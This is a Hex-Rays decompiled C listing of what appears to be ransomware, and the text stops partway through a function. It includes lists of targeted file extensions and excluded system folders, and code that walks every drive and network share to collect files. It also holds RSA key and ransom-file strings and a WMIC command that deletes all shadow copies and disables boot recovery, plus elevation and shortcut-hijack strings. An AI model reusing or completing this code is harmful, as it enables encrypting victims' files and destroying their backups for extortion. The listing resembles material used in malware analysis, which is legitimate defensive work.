/* This file was generated by the Hex-Rays decompiler version 9.4.0.260610.
   Copyright (c) 2007-2025 Hex-Rays <info@hex-rays.com>

   Detected compiler: Visual C++
*/

#include <windows.h>
#include <defs.h>


//-------------------------------------------------------------------------
// Function declarations

#define __thiscall __cdecl // Test compile in C mode

int __stdcall sub_4037C0(LPCWSTR lpString2); // idb
char __stdcall sub_4037EA(PCWSTR pszStart);
DWORD __stdcall sub_4038B1(int (__stdcall *a1)(wchar_t *, UINT, int, int), int a2, int a3);
struct _WIN32_FIND_DATAW *__stdcall sub_403902(LPWSTR lpString1);
struct _WIN32_FIND_DATAW *__stdcall sub_403A7E(LPWSTR lpString1, int a2, int a3, int a4);
int __stdcall sub_403A98(LPNETRESOURCEW lpNetResource); // idb
BOOL __stdcall sub_403B5D(void *a1);
BOOL __stdcall sub_403BCC(void *a1);
HLOCAL sub_403BEF();
WCHAR *__stdcall sub_403C45(LPCSTR lpString);
CHAR *__stdcall sub_403E11(HCRYPTKEY hKey);
void __stdcall sub_403FB3(int a1, int a2, LPCWSTR lpExistingFileName, LPCWSTR lpString);
int __stdcall sub_404006(CHAR *lpString, int a2);
void __stdcall sub_4041FD(int a1, int a2, LPCWSTR lpString, int a4);
WCHAR *__stdcall sub_40424D(int a1);
LPSTR __stdcall sub_4042D2(BYTE *pbBinary);
_BYTE *__stdcall sub_4043F2(LPCWSTR lpString);
CHAR *__stdcall sub_404428(LPCSTR lpString, PCSTR pszSrch, LPCSTR lpString2);
void __stdcall sub_40448D(int a1, int a2, LPCWSTR lpExistingFileName, LPCWSTR lpString);
int __stdcall sub_4044E6(BYTE *pbBinary); // idb
void __stdcall sub_404700(int a1, int a2, LPCWSTR lpExistingFileName, LPCWSTR lpString);
int __stdcall sub_404753(int a1, HCRYPTKEY hKey); // idb
int __stdcall sub_404A2C(int a1);
BYTE *__stdcall sub_404A96(DWORD NumberOfBytesRead);
BOOL __stdcall sub_404B2E(DWORD NumberOfBytesWritten, BYTE *a2, DWORD a3);
BOOL __stdcall sub_404BC0(int a1);
int sub_404BD1();
BOOL sub_404BED();
LPSTREAM sub_404C3C();
BOOL __stdcall sub_404C9D(HCRYPTKEY hKey);
HCRYPTKEY sub_404CFD();
int sub_404D3D();
int __stdcall sub_404DE2(LPCWSTR lpFileName); // idb
void __stdcall sub_40500E(LPCWSTR lpFileName);
BOOL __stdcall sub_40502E(BYTE *pbData, DWORD pdwDataLen);
BOOL sub_40507A();
int __stdcall sub_4050C8(WCHAR *lpFileName, PCWSTR pszStart, int a3);
int __stdcall sub_40527B(int a1);
WCHAR *__stdcall sub_40529F(WCHAR *lpString, LPCWSTR lpExistingFileName, int a3);
WCHAR *__stdcall sub_4054E2(WCHAR *lpString, int a2, LPCWSTR lpExistingFileName, int a4);
WCHAR *__stdcall sub_405502(LPCWSTR lpExistingFileName);
int __stdcall sub_40554D(LPCWSTR lpExistingFileName, LPNETRESOURCEW lpNetResource); // idb
void sub_40561E();
int __stdcall sub_405692(LPCWSTR lptstrFilename); // idb
int sub_4056F6();
int sub_405783();
void sub_405846();
void __thiscall sub_40589D(HKEY this);
void __noreturn start(); // weak
// PWSTR __stdcall StrRChrW(PCWSTR pszStart, PCWSTR pszEnd, WCHAR wMatch);
// PSTR __stdcall StrStrA(PCSTR pszFirst, PCSTR pszSrch);
// PWSTR __stdcall StrStrW(PCWSTR pszFirst, PCWSTR pszSrch);
// BOOL __stdcall VerQueryValueW(LPCVOID pBlock, LPCWSTR lpSubBlock, LPVOID *lplpBuffer, PUINT puLen);
// BOOL __stdcall GetFileVersionInfoW(LPCWSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData);
// DWORD __stdcall GetFileVersionInfoSizeW(LPCWSTR lptstrFilename, LPDWORD lpdwHandle);
// DWORD __stdcall WNetCloseEnum(HANDLE hEnum);
// DWORD __stdcall WNetEnumResourceW(HANDLE hEnum, LPDWORD lpcCount, LPVOID lpBuffer, LPDWORD lpBufferSize);
// DWORD __stdcall WNetOpenEnumW(DWORD dwScope, DWORD dwType, DWORD dwUsage, LPNETRESOURCEW lpNetResource, LPHANDLE lphEnum);

//-------------------------------------------------------------------------
// Data declarations

// extern BOOL (__stdcall *GetUserNameA)(LPSTR lpBuffer, LPDWORD pcbBuffer);
// extern BOOL (__stdcall *CryptGetHashParam)(HCRYPTHASH hHash, DWORD dwParam, BYTE *pbData, DWORD *pdwDataLen, DWORD dwFlags);
// extern BOOL (__stdcall *CryptHashData)(HCRYPTHASH hHash, const BYTE *pbData, DWORD dwDataLen, DWORD dwFlags);
// extern BOOL (__stdcall *CryptCreateHash)(HCRYPTPROV hProv, ALG_ID Algid, HCRYPTKEY hKey, DWORD dwFlags, HCRYPTHASH *phHash);
// extern BOOL (__stdcall *CryptExportKey)(HCRYPTKEY hKey, HCRYPTKEY hExpKey, DWORD dwBlobType, DWORD dwFlags, BYTE *pbData, DWORD *pdwDataLen);
// extern BOOL (__stdcall *CryptDestroyKey)(HCRYPTKEY hKey);
// extern BOOL (__stdcall *CryptEncrypt)(HCRYPTKEY hKey, HCRYPTHASH hHash, BOOL Final, DWORD dwFlags, BYTE *pbData, DWORD *pdwDataLen, DWORD dwBufLen);
// extern BOOL (__stdcall *CryptGenKey)(HCRYPTPROV hProv, ALG_ID Algid, DWORD dwFlags, HCRYPTKEY *phKey);
// extern BOOL (__stdcall *CryptAcquireContextW)(HCRYPTPROV *phProv, LPCWSTR szContainer, LPCWSTR szProvider, DWORD dwProvType, DWORD dwFlags);
// extern BOOL (__stdcall *CryptReleaseContext)(HCRYPTPROV hProv, DWORD dwFlags);
// extern LSTATUS (__stdcall *RegOpenKeyExW)(HKEY hKey, LPCWSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult);
// extern LSTATUS (__stdcall *RegDeleteValueW)(HKEY hKey, LPCWSTR lpValueName);
// extern LSTATUS (__stdcall *RegCloseKey)(HKEY hKey);
// extern BOOL (__stdcall *OpenProcessToken)(HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
// extern BOOL (__stdcall *GetTokenInformation)(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength);
// extern PUCHAR (__stdcall *GetSidSubAuthorityCount)(PSID pSid);
// extern PDWORD (__stdcall *GetSidSubAuthority)(PSID pSid, DWORD nSubAuthority);
// extern BOOL (__stdcall *CryptDecrypt)(HCRYPTKEY hKey, HCRYPTHASH hHash, BOOL Final, DWORD dwFlags, BYTE *pbData, DWORD *pdwDataLen);
// extern BOOL (__stdcall *CryptImportKey)(HCRYPTPROV hProv, const BYTE *pbData, DWORD dwDataLen, HCRYPTKEY hPubKey, DWORD dwFlags, HCRYPTKEY *phKey);
// extern BOOL (__stdcall *CryptDestroyHash)(HCRYPTHASH hHash);
// extern BOOL (__stdcall *CryptDecodeObjectEx)(DWORD dwCertEncodingType, LPCSTR lpszStructType, const BYTE *pbEncoded, DWORD cbEncoded, DWORD dwFlags, PCRYPT_DECODE_PARA pDecodePara, void *pvStructInfo, DWORD *pcbStructInfo);
// extern BOOL (__stdcall *CryptImportPublicKeyInfo)(HCRYPTPROV hCryptProv, DWORD dwCertEncodingType, PCERT_PUBLIC_KEY_INFO pInfo, HCRYPTKEY *phKey);
// extern BOOL (__stdcall *CryptProtectData)(DATA_BLOB *pDataIn, LPCWSTR szDataDescr, DATA_BLOB *pOptionalEntropy, PVOID pvReserved, CRYPTPROTECT_PROMPTSTRUCT *pPromptStruct, DWORD dwFlags, DATA_BLOB *pDataOut);
// extern BOOL (__stdcall *CryptUnprotectData)(DATA_BLOB *pDataIn, LPWSTR *ppszDataDescr, DATA_BLOB *pOptionalEntropy, PVOID pvReserved, CRYPTPROTECT_PROMPTSTRUCT *pPromptStruct, DWORD dwFlags, DATA_BLOB *pDataOut);
// extern BOOL (__stdcall *CryptBinaryToStringW)(const BYTE *pbBinary, DWORD cbBinary, DWORD dwFlags, LPWSTR pszString, DWORD *pcchString);
// extern BOOL (__stdcall *CryptStringToBinaryA)(LPCSTR pszString, DWORD cchString, DWORD dwFlags, BYTE *pbBinary, DWORD *pcbBinary, DWORD *pdwSkip, DWORD *pdwFlags);
// extern BOOL (__stdcall *CryptBinaryToStringA)(const BYTE *pbBinary, DWORD cbBinary, DWORD dwFlags, LPSTR pszString, DWORD *pcchString);
// extern SIZE_T (__stdcall *GlobalSize)(HGLOBAL hMem);
// extern SIZE_T (__stdcall *LocalSize)(HLOCAL hMem);
// extern BOOL (__stdcall *UnmapViewOfFile)(LPCVOID lpBaseAddress);
// extern LPVOID (__stdcall *MapViewOfFile)(HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, SIZE_T dwNumberOfBytesToMap);
// extern HANDLE (__stdcall *CreateFileMappingW)(HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCWSTR lpName);
// extern DWORD (__stdcall *GetFileAttributesW)(LPCWSTR lpFileName);
// extern void (__stdcall *Sleep)(DWORD dwMilliseconds);
// extern BOOL (__stdcall *DeleteFileW)(LPCWSTR lpFileName);
// extern DWORD (__stdcall *GetModuleFileNameW)(HMODULE hModule, LPWSTR lpFilename, DWORD nSize);
// extern DWORD (__stdcall *SetFilePointer)(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod);
// extern HANDLE (__stdcall *CreateMutexW)(LPSECURITY_ATTRIBUTES lpMutexAttributes, BOOL bInitialOwner, LPCWSTR lpName);
// extern void (__stdcall __noreturn *ExitProcess)(UINT uExitCode);
// extern HANDLE (__stdcall *OpenMutexW)(DWORD dwDesiredAccess, BOOL bInheritHandle, LPCWSTR lpName);
// extern LPWSTR (__stdcall *GetCommandLineW)();
// extern FARPROC (__stdcall *GetProcAddress)(HMODULE hModule, LPCSTR lpProcName);
// extern BOOL (__stdcall *GetVolumeInformationW)(LPCWSTR lpRootPathName, LPWSTR lpVolumeNameBuffer, DWORD nVolumeNameSize, LPDWORD lpVolumeSerialNumber, LPDWORD lpMaximumComponentLength, LPDWORD lpFileSystemFlags, LPWSTR lpFileSystemNameBuffer, DWORD nFileSystemNameSize);
// extern HMODULE (__stdcall *GetModuleHandleA)(LPCSTR lpModuleName);
// extern UINT (__stdcall *SetErrorMode)(UINT uMode);
// extern LPVOID (__stdcall *GlobalLock)(HGLOBAL hMem);
// extern int (__stdcall *WideCharToMultiByte)(UINT CodePage, DWORD dwFlags, LPCWCH lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCCH lpDefaultChar, LPBOOL lpUsedDefaultChar);
// extern BOOL (__stdcall *GlobalUnlock)(HGLOBAL hMem);
// extern DWORD (__stdcall *GetFileSize)(HANDLE hFile, LPDWORD lpFileSizeHigh);
// extern int (__stdcall *lstrcmpiW)(LPCWSTR lpString1, LPCWSTR lpString2);
// extern BOOL (__stdcall *ReadFile)(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
// extern BOOL (__stdcall *SetFileAttributesW)(LPCWSTR lpFileName, DWORD dwFileAttributes);
// extern HANDLE (__stdcall *CreateFileW)(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
// extern BOOL (__stdcall *WriteFile)(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
// extern BOOL (__stdcall *CloseHandle)(HANDLE hObject);
// extern BOOL (__stdcall *CopyFileW)(LPCWSTR lpExistingFileName, LPCWSTR lpNewFileName, BOOL bFailIfExists);
// extern LPSTR (__stdcall *lstrcpyA)(LPSTR lpString1, LPCSTR lpString2);
// extern LPSTR (__stdcall *lstrcatA)(LPSTR lpString1, LPCSTR lpString2);
// extern void (__stdcall *GetLocalTime)(LPSYSTEMTIME lpSystemTime);
// extern int (__stdcall *GetLocaleInfoA)(LCID Locale, LCTYPE LCType, LPSTR lpLCData, int cchData);
// extern int (__stdcall *lstrlenA)(LPCSTR lpString);
// extern int (__stdcall *GetLocaleInfoW)(LCID Locale, LCTYPE LCType, LPWSTR lpLCData, int cchData);
// extern HLOCAL (__stdcall *LocalAlloc)(UINT uFlags, SIZE_T uBytes);
// extern LPWSTR (__stdcall *lstrcatW)(LPWSTR lpString1, LPCWSTR lpString2);
// extern HANDLE (__stdcall *FindFirstFileW)(LPCWSTR lpFileName, LPWIN32_FIND_DATAW lpFindFileData);
// extern int (__stdcall *lstrlenW)(LPCWSTR lpString);
// extern int (__stdcall *lstrcmpW)(LPCWSTR lpString1, LPCWSTR lpString2);
// extern LPWSTR (__stdcall *lstrcpyW)(LPWSTR lpString1, LPCWSTR lpString2);
// extern HLOCAL (__stdcall *LocalFree)(HLOCAL hMem);
// extern BOOL (__stdcall *FindNextFileW)(HANDLE hFindFile, LPWIN32_FIND_DATAW lpFindFileData);
// extern BOOL (__stdcall *FindClose)(HANDLE hFindFile);
// extern DWORD (__stdcall *GetLogicalDrives)();
// extern UINT (__stdcall *GetDriveTypeW)(LPCWSTR lpRootPathName);
// extern HANDLE (__stdcall *GetCurrentProcess)();
// extern BOOL (__stdcall *ShellExecuteExW)(SHELLEXECUTEINFOW *pExecInfo);
// extern void (__stdcall *SHChangeNotify)(LONG wEventId, UINT uFlags, LPCVOID dwItem1, LPCVOID dwItem2);
// extern BOOL (__stdcall *SHGetSpecialFolderPathW)(HWND hwnd, LPWSTR pszPath, int csidl, BOOL fCreate);
// extern int (*wsprintfA)(LPSTR, LPCSTR, ...);
// extern int (*wsprintfW)(LPWSTR, LPCWSTR, ...);
// extern void (__stdcall *CoUninitialize)();
// extern HRESULT (__stdcall *GetHGlobalFromStream)(LPSTREAM pstm, HGLOBAL *phglobal);
// extern HRESULT (__stdcall *CoCreateInstance)(const IID *const rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, const IID *const riid, LPVOID *ppv);
// extern HRESULT (__stdcall *CoInitialize)(LPVOID pvReserved);
// extern HRESULT (__stdcall *CreateStreamOnHGlobal)(HGLOBAL hGlobal, BOOL fDeleteOnRelease, LPSTREAM *ppstm);
// extern BSTR (__stdcall *SysAllocString)(const OLECHAR *psz);
// extern void (__stdcall *SysFreeString)(BSTR bstrString);
BYTE pbData = 8u; // idb
CHAR byte_4011D4 = '\xD8'; // idb
wchar_t *off_4011F4 = L"HTML"; // weak
BYTE pszString[] = { 78u }; // idb
CHAR String = '\xE5'; // idb
BYTE dword_403098 = 46u; // idb
wchar_t *off_4030B8[27] =
{
  L"windows",
  L"program files",
  L"program files (x86)",
  L"games",
  L".xls",
  L".doc",
  L".xlsx",
  L".docx",
  L".rtf",
  L".odt",
  L".pdf",
  L".psd",
  L".dwg",
  L".cdr",
  L".cd",
  L".mdb",
  L".1cd",
  L".dbf",
  L".sqlite",
  L".accdb",
  L".jpg",
  L".jpeg",
  L".tiff",
  L".zip",
  L".rar",
  L".7z",
  L".backup"
}; // weak
wchar_t *off_4030C8[23] =
{
  L".xls",
  L".doc",
  L".xlsx",
  L".docx",
  L".rtf",
  L".odt",
  L".pdf",
  L".psd",
  L".dwg",
  L".cdr",
  L".cd",
  L".mdb",
  L".1cd",
  L".dbf",
  L".sqlite",
  L".accdb",
  L".jpg",
  L".jpeg",
  L".tiff",
  L".zip",
  L".rar",
  L".7z",
  L".backup"
}; // weak
wchar_t *off_4030E0[17] =
{
  L".pdf",
  L".psd",
  L".dwg",
  L".cdr",
  L".cd",
  L".mdb",
  L".1cd",
  L".dbf",
  L".sqlite",
  L".accdb",
  L".jpg",
  L".jpeg",
  L".tiff",
  L".zip",
  L".rar",
  L".7z",
  L".backup"
}; // weak
wchar_t *off_4030E4[16] =
{
  L".psd",
  L".dwg",
  L".cdr",
  L".cd",
  L".mdb",
  L".1cd",
  L".dbf",
  L".sqlite",
  L".accdb",
  L".jpg",
  L".jpeg",
  L".tiff",
  L".zip",
  L".rar",
  L".7z",
  L".backup"
}; // weak
wchar_t *off_4030F0[13] =
{
  L".cd",
  L".mdb",
  L".1cd",
  L".dbf",
  L".sqlite",
  L".accdb",
  L".jpg",
  L".jpeg",
  L".tiff",
  L".zip",
  L".rar",
  L".7z",
  L".backup"
}; // weak
wchar_t *off_403108[7] = { L".jpg", L".jpeg", L".tiff", L".zip", L".rar", L".7z", L".backup" }; // weak
wchar_t *off_403114[4] = { L".zip", L".rar", L".7z", L".backup" }; // weak
WCHAR asc_4032AC[] = L".."; // idb
WCHAR asc_4032B4[] = L"."; // idb
WCHAR String2[] = L"\\*.*"; // idb
WCHAR aS02x01x01x01x[] = L"%s%02X%01X-%01X%01X"; // idb
CHAR asc_403300[] = "|"; // idb
CHAR aEndRsaPrivateK[] = "-----END RSA PRIVATE KEY-----\r\n"; // idb
CHAR aBeginRsaPrivat[] = "-----BEGIN RSA PRIVATE KEY-----\r\n"; // idb
WCHAR aSSKey[] = L"%s\\%s.KEY"; // idb
WCHAR aSKey[] = L"\\%s.KEY"; // idb
WCHAR aSSS[] = L"%s\\%s.%s"; // idb
WCHAR aSS[] = L"\\%s.%s"; // idb
CHAR aData[] = "{data}"; // idb
CHAR pszSrch[] = "{key}"; // idb
WCHAR aSSLst[] = L"%s\\%s.LST"; // idb
WCHAR aSLst[] = L"\\%s.LST"; // idb
int dword_4033D8 = 0; // weak
wchar_t asc_4033DC[3] = L"\r\n"; // weak
WCHAR aLnk[] = L".lnk"; // idb
WCHAR aCExplorerExeST[] = L"/c explorer.exe \"%s\" & type \"%s\" > \"%%tmp%%\\%s\" & start \"%s\" \"%%tmp%%\\%s\""; // idb
OLECHAR aCmdExe[] = L"cmd.exe"; // idb
OLECHAR psz[] = L"shell32.dll"; // idb
WCHAR a08x04x04x02x02[] = L"%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x.exe"; // idb
WCHAR aSU[] = L"%s\\%u"; // idb
WCHAR aZoneIdentifier[] = L":Zone.Identifier"; // idb
WCHAR SubBlock[] = L"\\"; // idb
wchar_t aRunas[6] = L"runas"; // weak
WCHAR aCSU[] = L"/c \"%s\" /u"; // idb
wchar_t aProcessCallCre[185] = L"process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\""; // weak
wchar_t aWmicExe[9] = L"wmic.exe"; // weak
WCHAR ValueName[] = L"IsShortcut"; // idb
WCHAR SubKey[] = L"SOFTWARE\\Classes\\lnkfile"; // idb
WCHAR aU_0[] = L"\\%u"; // idb
WCHAR aMU[] = L"m%u"; // idb
WCHAR aU[] = L"/u"; // idb
CHAR aMemcpy[] = "memcpy"; // idb
CHAR aMemset[] = "memset"; // idb
CHAR ProcName[] = "RtlComputeCrc32"; // idb
CHAR ModuleName[] = "ntdll.dll"; // idb
int dword_403790[2] = { 267, 0 }; // weak
IID riid = { 136441u, 0u, 0u, { 192u, 0u, 0u, 0u, 0u, 0u, 0u, 70u } }; // idb
IID rclsid = { 136193u, 0u, 0u, { 192u, 0u, 0u, 0u, 0u, 0u, 0u, 70u } }; // idb
int dword_405E90 = 0; // weak
int dword_405E94 = 0; // weak
int dword_405E98 = 0; // weak
int dword_405E9C = 0; // weak
int dword_405EA0 = 0; // weak
int dword_405EA4 = 0; // weak
DATA_BLOB pOptionalEntropy = { 0u, NULL }; // idb
HCRYPTPROV hProv = 0u; // idb
LPSTREAM ppstm = NULL; // idb
void *(__cdecl *memcpy)(void *, const void *Src, size_t Size) = NULL; // idb
void *(__cdecl *memset)(void *, int Val, size_t Size) = NULL; // idb
int (__stdcall *RtlComputeCrc32)(_DWORD, _DWORD, _DWORD) = NULL; // weak
HCRYPTKEY hKey = 0u; // idb
HCRYPTKEY phKey = 0u; // idb
DWORD VolumeSerialNumber = 0u; // idb
HANDLE hObject = NULL; // idb


//----- (004037C0) --------------------------------------------------------
int __stdcall sub_4037C0(LPCWSTR lpString2)
{
  int v1; // esi

  v1 = 0;
  while ( lstrcmpiW(off_4030B8[v1], lpString2) != 0 )
  {
    if ( (unsigned int)++v1 >= 4 )
      return 0;
  }
  return 1;
}
// 4030B8: using guessed type wchar_t *off_4030B8[27];

//----- (004037EA) --------------------------------------------------------
char __stdcall sub_4037EA(PCWSTR pszStart)
{
  unsigned int v1; // edi
  const WCHAR *v2; // ebp
  unsigned int i; // edi
  unsigned int j; // edi
  unsigned int k; // edi
  unsigned int m; // edi
  int v7; // edi

  v1 = 0;
  v2 = StrRChrW(pszStart, nullptr, 0x2Eu);
  if ( v2 == nullptr )
    return 0;
  do
  {
    if ( lstrcmpiW(off_4030C8[v1], v2) == 0 )
      return 1;
    ++v1;
  }
  while ( v1 < 6 );
  for ( i = 0; i < 1; ++i )
  {
    if ( lstrcmpiW(off_4030E0[i], v2) == 0 )
      return 2;
  }
  for ( j = 0; j < 3; ++j )
  {
    if ( lstrcmpiW(off_4030E4[j], v2) == 0 )
      return 3;
  }
  for ( k = 0; k < 6; ++k )
  {
    if ( lstrcmpiW(off_4030F0[k], v2) == 0 )
      return 4;
  }
  for ( m = 0; m < 3; ++m )
  {
    if ( lstrcmpiW(off_403108[m], v2) == 0 )
      return 5;
  }
  v7 = 0;
  while ( lstrcmpiW(off_403114[v7], v2) != 0 )
  {
    if ( (unsigned int)++v7 >= 4 )
      return 0;
  }
  return 6;
}
// 4030C8: using guessed type wchar_t *off_4030C8[23];
// 4030E0: using guessed type wchar_t *off_4030E0[17];
// 4030E4: using guessed type wchar_t *off_4030E4[16];
// 4030F0: using guessed type wchar_t *off_4030F0[13];
// 403108: using guessed type wchar_t *[7];
// 403114: using guessed type wchar_t *[4];

//----- (004038B1) --------------------------------------------------------
DWORD __stdcall sub_4038B1(int (__stdcall *a1)(wchar_t *, UINT, int, int), int a2, int a3)
{
  DWORD result; // eax
  DWORD v4; // ebx
  unsigned int i; // esi
  UINT DriveTypeW; // eax
  wchar_t RootPathName[8]; // [esp+8h] [ebp-10h] BYREF

  result = GetLogicalDrives();
  v4 = result;
  for ( i = 0; i < 0x1A; ++i )
  {
    if ( (v4 & 1) != 0 )
    {
      RootPathName[0] = i + 65;
      wcscpy(&RootPathName[1], L":");
      DriveTypeW = GetDriveTypeW(RootPathName);
      result = a1(RootPathName, DriveTypeW, a2, a3);
    }
    v4 >>= 1;
  }
  return result;
}

//----- (00403902) --------------------------------------------------------
struct _WIN32_FIND_DATAW *__stdcall sub_403902(LPWSTR lpString1)
{
  struct _WIN32_FIND_DATAW *result; // eax
  struct _WIN32_FIND_DATAW *v2; // esi
  const WCHAR *cFileName; // ebx
  int v5; // esi
  int v6; // eax
  WCHAR *v7; // eax
  WCHAR *v8; // esi
  int v9; // esi
  int v10; // esi
  int v11; // [esp+10h] [ebp-8h]
  ULONG v12; // [esp+14h] [ebp-4h] BYREF
  LPWSTR lpString1a; // [esp+1Ch] [ebp+4h]

  result = (struct _WIN32_FIND_DATAW *)LocalAlloc(0x40u, 0x250u);
  v2 = result;
  v11 = (int)result;
  if ( result == nullptr )
    return result;
  lstrcatW(lpString1, String2);
  lpString1a = (LPWSTR)FindFirstFileW(lpString1, v2);
  if ( lpString1a == (LPWSTR)-1 )
    return (struct _WIN32_FIND_DATAW *)LocalFree(v2);
  StrRChrW(lpString1, nullptr, 0x5Cu)[1] = 0;
  while ( 1 )
  {
    cFileName = v2->cFileName;
    if ( (v2->dwFileAttributes & 0x10) != 0 )
    {
      if ( lstrcmpW(v2->cFileName, asc_4032B4) == 0
        || lstrcmpW(v2->cFileName, asc_4032AC) == 0
        || sub_4037C0(v2->cFileName) != 0 )
      {
        goto LABEL_15;
      }
      v5 = lstrlenW(v2->cFileName);
      v6 = lstrlenW(lpString1);
      v7 = (WCHAR *)LocalAlloc(0x40u, 2 * (v6 + v5) + 10);
      v8 = v7;
      if ( v7 != nullptr )
      {
        lstrcpyW(v7, lpString1);
        lstrcatW(v8, cFileName);
        sub_403902(v8);
        goto LABEL_13;
      }
LABEL_14:
      v2 = (struct _WIN32_FIND_DATAW *)v11;
      goto LABEL_15;
    }
    if ( sub_4037EA(v2->cFileName) != 0 )
      break;
LABEL_15:
    if ( !FindNextFileW(lpString1a, v2) )
      goto LABEL_18;
  }
  v9 = lstrlenW(v2->cFileName);
  v10 = lstrlenW(lpString1) + v9;
  v12 = 2 * v10 + 2;
  v8 = (WCHAR *)LocalAlloc(0x40u, 2 * v10 + 4);
  if ( v8 == nullptr )
    goto LABEL_14;
  *v8 = v12 - 2;
  lstrcpyW(v8 + 1, lpString1);
  lstrcatW(v8 + 1, (LPCWSTR)(v11 + 44));
  if ( ppstm->lpVtbl->Write(ppstm, v8, v12, &v12) == 0 )
  {
LABEL_13:
    LocalFree(v8);
    goto LABEL_14;
  }
  v2 = (struct _WIN32_FIND_DATAW *)v11;
LABEL_18:
  FindClose(lpString1a);
  return (struct _WIN32_FIND_DATAW *)LocalFree(v2);
}

//----- (00403A7E) --------------------------------------------------------
struct _WIN32_FIND_DATAW *__stdcall sub_403A7E(LPWSTR lpString1, int a2, int a3, int a4)
{
  struct _WIN32_FIND_DATAW *result; // eax

  if ( a2 == 2 || a2 == 3 )
    return sub_403902(lpString1);
  return result;
}

//----- (00403A98) --------------------------------------------------------
int __stdcall sub_403A98(LPNETRESOURCEW lpNetResource)
{
  int result; // eax
  LPCWSTR *v2; // eax
  LPCWSTR *v3; // edi
  LPCWSTR *v4; // esi
  int v5; // eax
  WCHAR *v6; // eax
  WCHAR *v7; // edi
  LPCWSTR *v8; // [esp+0h] [ebp-Ch]
  DWORD BufferSize; // [esp+4h] [ebp-8h] BYREF
  HANDLE hEnum; // [esp+8h] [ebp-4h] BYREF

  result = WNetOpenEnumW(2u, 0, 0, lpNetResource, &hEnum);
  if ( result == 0 )
  {
    v2 = (LPCWSTR *)LocalAlloc(0x40u, 0x4000u);
    v3 = v2;
    v8 = v2;
    if ( v2 != nullptr )
    {
      lpNetResource = (LPNETRESOURCEW)-1;
      BufferSize = 0x4000;
      if ( WNetEnumResourceW(hEnum, (LPDWORD)&lpNetResource, v2, &BufferSize) == 0 && lpNetResource != nullptr )
      {
        v4 = v3 + 5;
        do
        {
          if ( (*(_BYTE *)(v4 - 2) & 2) != 0 )
          {
            sub_403A98((LPNETRESOURCEW)(v4 - 5));
          }
          else if ( *(v4 - 4) == (LPCWSTR)1 )
          {
            v5 = lstrlenW(*v4);
            v6 = (WCHAR *)LocalAlloc(0x40u, 2 * v5 + 16);
            v7 = v6;
            if ( v6 != nullptr )
            {
              lstrcpyW(v6, *v4);
              sub_403902(v7);
              LocalFree(v7);
            }
          }
          v4 += 8;
          lpNetResource = (LPNETRESOURCEW)((char *)lpNetResource - 1);
        }
        while ( lpNetResource != nullptr );
        v3 = v8;
      }
      LocalFree(v3);
    }
    return WNetCloseEnum(hEnum);
  }
  return result;
}

//----- (00403B5D) --------------------------------------------------------
BOOL __stdcall sub_403B5D(void *a1)
{
  int v2; // [esp+4h] [ebp-8h] BYREF
  ULONG v3; // [esp+8h] [ebp-4h] BYREF

  v3 = 0;
  dword_405EBC(a1, 0, 2048);
  return ppstm->lpVtbl->Read(ppstm, &v3, 2, (ULONG *)&v2) == 0
      && v2 == 2
      && v3 < 0x800
      && ppstm->lpVtbl->Read(ppstm, a1, v3, (ULONG *)&v2) == 0
      && v2 == v3;
}
// 405EBC: using guessed type int (__cdecl *dword_405EBC)(_DWORD, _DWORD, _DWORD);

//----- (00403BCC) --------------------------------------------------------
BOOL __stdcall sub_403BCC(void *a1)
{
  return ((int (__stdcall *)(LPSTREAM, _DWORD, _DWORD, _DWORD, _DWORD))ppstm->lpVtbl->Seek)(ppstm, 0, 0, 0, 0) == 0
      && sub_403B5D(a1);
}

//----- (00403BEF) --------------------------------------------------------
HLOCAL sub_403BEF()
{
  HLOCAL result; // eax
  void *v1; // esi
  BOOL i; // eax
  unsigned __int8 v3; // al

  result = LocalAlloc(0x40u, 0x800u);
  v1 = result;
  if ( result != nullptr )
  {
    dword_405EBC(&dword_405E90, 0, 24);
    for ( i = sub_403BCC(v1); i; i = sub_403B5D(v1) )
    {
      v3 = sub_4037EA((PCWSTR)v1);
      if ( v3 != 0 )
        ++*((_DWORD *)WNetOpenEnumW + v3 + 1);
    }
    return LocalFree(v1);
  }
  return result;
}
// 405E90: using guessed type int dword_405E90;
// 405EBC: using guessed type int (__cdecl *dword_405EBC)(_DWORD, _DWORD, _DWORD);

//----- (00403C45) --------------------------------------------------------
WCHAR *__stdcall sub_403C45(LPCSTR lpString)
{
  WCHAR *v1; // esi
  DWORD v2; // eax
  int v3; // eax
  unsigned int v4; // ebx
  CHAR *v5; // edx
  unsigned int v6; // ecx
  WCHAR *v7; // edi
  unsigned int v8; // ecx
  WCHAR *v9; // edi
  int i; // ecx
  __int16 v12; // [esp-8h] [ebp-90h]
  CHAR v13[72]; // [esp+8h] [ebp-80h] BYREF
  WCHAR LCData[16]; // [esp+50h] [ebp-38h] BYREF
  BYTE pbData; // [esp+70h] [ebp-18h] BYREF
  unsigned __int8 v16; // [esp+71h] [ebp-17h]
  unsigned __int8 v17; // [esp+72h] [ebp-16h]
  DWORD pdwDataLen; // [esp+80h] [ebp-8h] BYREF
  HCRYPTHASH phHash; // [esp+84h] [ebp-4h] BYREF

  v1 = nullptr;
